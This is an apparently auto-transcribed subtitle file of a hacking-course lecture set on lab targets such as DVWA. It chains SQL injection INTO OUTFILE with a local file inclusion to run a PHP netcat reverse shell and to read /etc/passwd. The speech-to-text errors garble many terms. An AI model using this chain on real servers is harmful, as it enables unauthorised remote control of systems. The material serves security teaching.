1
00:00:01,400 --> 00:00:07,910
And the previous lecture we see and how we can write stuff to the server use and a skill injection used

2
00:00:07,910 --> 00:00:10,180
in the into out file function.

3
00:00:10,400 --> 00:00:15,770
And if the server allow us to write to the web directory to our place that we can browse then we can

4
00:00:15,770 --> 00:00:20,930
just write our reverse show using the same code that we've seen before use and pass through and then

5
00:00:20,930 --> 00:00:28,750
we can browse it and we'll get a reverse shell exactly the same way that we did when we upload the file.

6
00:00:28,750 --> 00:00:34,730
The problem is we weren't able to write stuff to the web directories so we can't actually read the stuff

7
00:00:34,750 --> 00:00:36,020
using the R L.

8
00:00:36,160 --> 00:00:39,220
The only place that we could write to was that VMP.

9
00:00:39,220 --> 00:00:42,760
So you can't actually browse the MP through your l.

10
00:00:42,910 --> 00:00:45,910
Therefore you can't just browse that file.

11
00:00:45,970 --> 00:00:52,030
So I'm going to do today is I'm going to show you a workaround for that problem but for this workaround

12
00:00:52,030 --> 00:00:59,170
to work the same website or the same server has to have a local file inclusion.

13
00:00:59,200 --> 00:01:00,590
This is very important.

14
00:01:00,610 --> 00:01:05,740
The same web server not the same Web site because we see and remember in the first section how we can

15
00:01:05,740 --> 00:01:09,250
discover all the Web sites that are within one server.

16
00:01:09,430 --> 00:01:15,370
So if one of them has an obscure injection and the other has a local file inclusion you can combine

17
00:01:15,370 --> 00:01:19,090
both of these and get a shell and I'll show you how to do that.

18
00:01:19,450 --> 00:01:22,260
So I'm actually going to be doing this on the DVD.

19
00:01:22,290 --> 00:01:28,230
You can do it on Matel day but I'm just doing it here just for a change to show you just another example.

20
00:01:28,330 --> 00:01:32,120
So I'm going to the skill injection and I'm going to put number one here

21
00:01:34,750 --> 00:01:40,230
submitted and then we're going to start doing our injection exactly the same way that we always did.

22
00:01:40,240 --> 00:01:51,950
So we close the quote and we do a union select one to our comment and that's work.

23
00:01:51,960 --> 00:01:59,040
As you can see now what I'm going to do I'm going to write my shell to TNP and then I'm going to browse

24
00:01:59,040 --> 00:02:01,660
that shelf through the local file inclusion.

25
00:02:01,800 --> 00:02:10,690
So my exploit is going to be unique select one to and in one I'm actually going to write what I want

26
00:02:10,690 --> 00:02:11,760
to write to the file.

27
00:02:11,890 --> 00:02:17,290
So I'm going to write a PH code the same ph code that we've been using to get a reverse connection to

28
00:02:17,290 --> 00:02:30,200
my computer and the code is going to be passed through and see bin sh my IP the port which is 80 80

29
00:02:32,280 --> 00:02:39,000
and instead of number two I'm going to put null so nothing will be written to the file.

30
00:02:39,170 --> 00:02:41,240
And then we're going to say into our file

31
00:02:44,560 --> 00:02:48,220
and we'll call this reversed BHP.

32
00:02:48,230 --> 00:02:51,710
So let's just have another look on this exploit.

33
00:02:51,710 --> 00:02:57,960
So what we're doing we're doing a normal Union select and we're doing a normal into our file and we're

34
00:02:58,270 --> 00:03:02,020
saving this in the TNP exactly like we've seen in the previous lecture.

35
00:03:02,420 --> 00:03:08,780
But instead of writing just normal stuff we're actually going to write ph code and we're going to do

36
00:03:08,780 --> 00:03:17,090
a pass through and see bin sh my IP port and what this is going to do it's actually going to try to

37
00:03:17,090 --> 00:03:21,480
connect to this IP using netcat.

38
00:03:22,110 --> 00:03:26,030
So let's exploit this.

39
00:03:26,360 --> 00:03:31,820
And I'm actually going to said the idea here to minus one so that no values come in for the admin and

40
00:03:31,830 --> 00:03:35,940
admin in here in the first name and the surname.

41
00:03:35,960 --> 00:03:42,990
So I just said that to minus one and then I'm going to put my exploit here after the minus one say that

42
00:03:42,990 --> 00:03:51,570
we always do it and enter and it tells us that the file already exists but it actually does and this

43
00:03:51,570 --> 00:03:52,990
is just the normal error.

44
00:03:53,190 --> 00:03:57,450
So this file has been written now to the server.

45
00:03:57,460 --> 00:04:02,590
Now the problem is if if we load this file to somewhere else other than DMP.

46
00:04:02,590 --> 00:04:13,960
So for example if we can actually write this file to say var the WW D-B w a then we'd be able to just

47
00:04:13,960 --> 00:04:17,610
go and browse this file from here.

48
00:04:19,530 --> 00:04:26,940
So all we have to do is just go to the w t to this and then right in reverse the THP and then we'll

49
00:04:26,940 --> 00:04:28,000
be able to see it.

50
00:04:28,110 --> 00:04:30,820
But again we actually don't have permission to write in here.

51
00:04:30,840 --> 00:04:36,690
You can try to write in images for example GBW 8 images so you can actually before you go to this method

52
00:04:37,050 --> 00:04:41,810
you can go ahead and try to find a place or ridable place on the server.

53
00:04:42,030 --> 00:04:43,810
A lot of the time you want.

54
00:04:43,920 --> 00:04:48,510
Because web admins should actually know about this and show you they shouldn't allow you to write stuff

55
00:04:48,510 --> 00:04:49,150
like that.

56
00:04:49,260 --> 00:04:54,120
But if you did then you're lucky you can just go ahead and browse it like this if you didn't then just

57
00:04:54,120 --> 00:04:57,050
continue this video and see how we're going to exploit it.

58
00:04:57,420 --> 00:05:00,650
So now I'm just going to listen for connections use and and netcat.

59
00:05:00,690 --> 00:05:06,860
So I'm going to do and see the LP 88.

60
00:05:08,440 --> 00:05:11,720
And that will listen for incoming connections on port 80 80.

61
00:05:11,770 --> 00:05:16,920
So when we execute this code it'll try to connect back to us and we'll get the connection here.

62
00:05:18,000 --> 00:05:21,620
So now we have the file written and we're listening in on connections.

63
00:05:21,630 --> 00:05:25,370
All we need is a way to browse this file to get it executed.

64
00:05:25,560 --> 00:05:31,960
So we see in that we can't actually write anywhere that we can browse it and because we start this in

65
00:05:31,960 --> 00:05:37,220
time if you managed to run it from anywhere on the web server then you'll have connection and you'll

66
00:05:37,230 --> 00:05:38,800
have access to this website.

67
00:05:38,860 --> 00:05:42,860
So you don't have to find a local file inclusion in the same website.

68
00:05:42,960 --> 00:05:45,940
You can find it in any web site in the same server.

69
00:05:46,020 --> 00:05:49,430
And this is where the information gathering part comes in really handy.

70
00:05:49,920 --> 00:05:54,350
So I'm going to do what I'm going to do now is I'm actually just going to run from within DVD-Video

71
00:05:54,490 --> 00:05:57,760
8 but I just want you to know that you can do this.

72
00:05:57,840 --> 00:06:04,500
Since we started in the TNP you can open it and browse it from within any web site on the server.

73
00:06:04,500 --> 00:06:10,460
So all you have to do is just find a web site on the same server that has a local file inclusion.

74
00:06:10,470 --> 00:06:14,340
Now I'm going to go to the file inclusion and we've used this before.

75
00:06:14,340 --> 00:06:23,620
So what I'm going to do is I'm just going to browse to it passwords first to make sure it works and

76
00:06:23,620 --> 00:06:24,580
it works.

77
00:06:24,580 --> 00:06:29,020
Now we're going to browse to our file that we just uploaded which is stored in DNP

78
00:06:31,860 --> 00:06:37,210
reverse that BHP.

79
00:06:37,380 --> 00:06:45,000
And as you can see now we've got a connection and we can run any commands we want on the server and

80
00:06:45,600 --> 00:06:48,740
very much we have a reverse shell and we can do whatever we want on it.

81
00:06:51,750 --> 00:06:58,080
Now I'm going to listen on AT&amp;T again and what I want to do is I want to show you how you can exploit

82
00:06:58,080 --> 00:06:59,940
this now from anywhere within the server.

83
00:06:59,940 --> 00:07:02,710
So I'm actually going to go to Mattel today instead of DPW 8

84
00:07:05,900 --> 00:07:09,360
and we're going to go to the local file inclusion vulnerability in here.

85
00:07:12,850 --> 00:07:15,610
So we'll try to exploit this now the same way.

86
00:07:15,610 --> 00:07:17,470
So it's five times back

87
00:07:19,980 --> 00:07:21,540
UTC password.

88
00:07:21,660 --> 00:07:24,210
And as you can see we can read the HTC password.

89
00:07:24,330 --> 00:07:26,810
Now all we have to do is just read that VMP.

90
00:07:26,820 --> 00:07:29,840
So this is a completely separate website from DVD-Video.

91
00:07:30,090 --> 00:07:35,700
We found let's assume that we found a scale injection in DVD anyway and then we found a local inclusion

92
00:07:35,700 --> 00:07:41,050
in this combining the two because the two websites are installed on the same server on the same computer.

93
00:07:41,070 --> 00:07:44,960
We can actually get a reverse shell on that server and do that.

94
00:07:44,970 --> 00:07:49,860
We're just going to go to TNP airburst APHC.

95
00:07:50,090 --> 00:07:55,880
And again as you can see we have our shell here where we can do whatever we want on the target's web

96
00:07:55,880 --> 00:07:57,100
server.

97
00:07:57,110 --> 00:08:02,490
So again the idea to take from here is use an into out while you can write stuff anywhere.

98
00:08:02,630 --> 00:08:06,860
If you can write stuff within the web directory then you're lucky you can write your reverse shell and

99
00:08:06,860 --> 00:08:10,980
just browse it through with your file as if you're browsing any file on the web server.

100
00:08:11,030 --> 00:08:17,420
If you can't then look for another Web site on the same server that has a local file inclusion and if

101
00:08:17,420 --> 00:08:22,910
you do then you can just write the file using the SQL injection and then browse it using the local file

102
00:08:22,910 --> 00:08:25,040
inclusion and you have your show.